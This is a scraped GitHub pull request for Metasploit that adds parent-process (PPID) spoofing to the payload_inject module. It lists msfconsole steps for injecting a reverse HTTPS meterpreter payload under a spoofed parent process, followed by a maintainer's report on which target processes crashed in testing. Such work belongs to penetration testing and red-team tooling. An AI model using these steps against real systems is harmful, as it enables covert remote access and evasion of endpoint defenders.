Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add support for PPID spoofing #12736

wants to merge 9 commits into
base: master

Add support for PPID spoofing #12736

wants to merge 9 commits into from


Copy link

phra commented Dec 17, 2019

will fix rapid7/metasploit-payloads#373

requires rapid7/metasploit-payloads#374


List the steps needed to make sure this thing works

  • Start msfconsole
  • spawn meterpreter
  • use exploit/windows/local/payload_inject
  • set payload windows/x64/meterpreter/reverse_https
  • set lhost ...
  • set lport ...
  • set PPID ... (PPID to spoof for new agent)
  • a new agent is spawned under the specified PPID
phra added 9 commits Dec 17, 2019
@bcoles bcoles added the enhancement label Dec 18, 2019
@bwatters-r7 bwatters-r7 self-assigned this Dec 19, 2019

This comment has been minimized.

Copy link

bwatters-r7 commented Jan 17, 2020

I had some time to play with this today.... it is a neat feature, but it is prickly.
I was able to get it to work by choosing a notepad process as the PPID, but I was unable to get anything else to work. Calc failed and crashed calc; edge failed and crashed edge. Svchosts also failed. Occasionally I got Access Denied errors, but also, sometimes the spawned process just crashed and took the parent process with it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
3 participants
You can’t perform that action at this time.